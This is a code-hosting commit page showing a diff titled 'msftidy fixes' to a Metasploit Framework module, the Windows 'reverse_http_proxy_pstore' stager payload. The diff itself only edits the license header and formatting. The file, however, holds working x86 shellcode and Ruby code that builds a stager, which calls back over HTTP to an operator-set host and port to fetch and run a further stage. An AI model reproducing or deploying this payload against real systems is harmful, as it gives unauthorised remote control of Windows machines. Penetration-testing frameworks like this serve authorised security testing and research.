msftidy fixes
Brent Cook
parent
99cd36c036
commit
91b4a59fc7
|
|
@ -1,42 +1,39 @@
|
||||||
##
|
##
|
||||||
# This file is part of the Metasploit Framework and may be subject to
|
# This module requires Metasploit: http://metasploit.com/download
|
||||||
# redistribution and commercial restrictions. Please see the Metasploit
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
# web site for more information on licensing and terms of use.
|
|
||||||
# http://metasploit.com/
|
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
require 'msf/core/handler/reverse_http'
|
require 'msf/core/handler/reverse_http'
|
||||||
|
|
||||||
|
|
||||||
module Metasploit3
|
module Metasploit3
|
||||||
|
|
||||||
include Msf::Payload::Stager
|
include Msf::Payload::Stager
|
||||||
include Msf::Payload::Windows
|
include Msf::Payload::Windows
|
||||||
|
|
||||||
def self.handler_type_alias
|
def self.handler_type_alias
|
||||||
"reverse_http_proxy_pstore"
|
"reverse_http_proxy_pstore"
|
||||||
end
|
end
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(merge_info(info,
|
super(merge_info(info,
|
||||||
'Name' => 'Reverse HTTP Stager Proxy',
|
'Name' => 'Reverse HTTP Stager Proxy',
|
||||||
'Description' => 'Tunnel communication over HTTP',
|
'Description' => 'Tunnel communication over HTTP',
|
||||||
'Author' => 'hdm',
|
'Author' => 'hdm',
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Arch' => ARCH_X86,
|
'Arch' => ARCH_X86,
|
||||||
'Handler' => Msf::Handler::ReverseHttp,
|
'Handler' => Msf::Handler::ReverseHttp,
|
||||||
'Convention' => 'sockedi http',
|
'Convention' => 'sockedi http',
|
||||||
'Stager' =>
|
'Stager' =>
|
||||||
{
|
{
|
||||||
'Offsets' =>
|
'Offsets' =>
|
||||||
{
|
{
|
||||||
'EXITFUNC' => [ 579, 'V' ],
|
'EXITFUNC' => [ 579, 'V' ],
|
||||||
'LPORT' => [ 499, 'v' ], # Not a typo, really little endian
|
'LPORT' => [ 499, 'v' ], # Not a typo, really little endian
|
||||||
},
|
},
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
# Built on Thu Mar 6 02:37:12 2014
|
# Built on Thu Mar 6 02:37:12 2014
|
||||||
|
|
||||||
# Name: stager_reverse_http_proxy_pstore
|
# Name: stager_reverse_http_proxy_pstore
|
||||||
|
|
@ -84,31 +81,31 @@ module Metasploit3
|
||||||
"\x89\xE7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF" +
|
"\x89\xE7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF" +
|
||||||
"\xD5\x85\xC0\x74\xCD\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\x5E" +
|
"\xD5\x85\xC0\x74\xCD\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\x5E" +
|
||||||
"\x5E\x5E\x59\x5A\xE8\x60\xFF\xFF\xFF"}
|
"\x5E\x5E\x59\x5A\xE8\x60\xFF\xFF\xFF"}
|
||||||
))
|
))
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Do not transmit the stage over the connection. We handle this via HTTPS
|
# Do not transmit the stage over the connection. We handle this via HTTPS
|
||||||
#
|
#
|
||||||
def stage_over_connection?
|
def stage_over_connection?
|
||||||
false
|
false
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Generate the first stage
|
# Generate the first stage
|
||||||
#
|
#
|
||||||
def generate
|
def generate
|
||||||
p = super
|
p = super
|
||||||
i = p.index("/12345\x00")
|
i = p.index("/12345\x00")
|
||||||
u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW) + "\x00"
|
u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW) + "\x00"
|
||||||
p[i, u.length] = u
|
p[i, u.length] = u
|
||||||
p + datastore['LHOST'].to_s + "\x00"
|
p + datastore['LHOST'].to_s + "\x00"
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Always wait at least 20 seconds for this payload (due to staging delays)
|
# Always wait at least 20 seconds for this payload (due to staging delays)
|
||||||
#
|
#
|
||||||
def wfs_delay
|
def wfs_delay
|
||||||
20
|
20
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue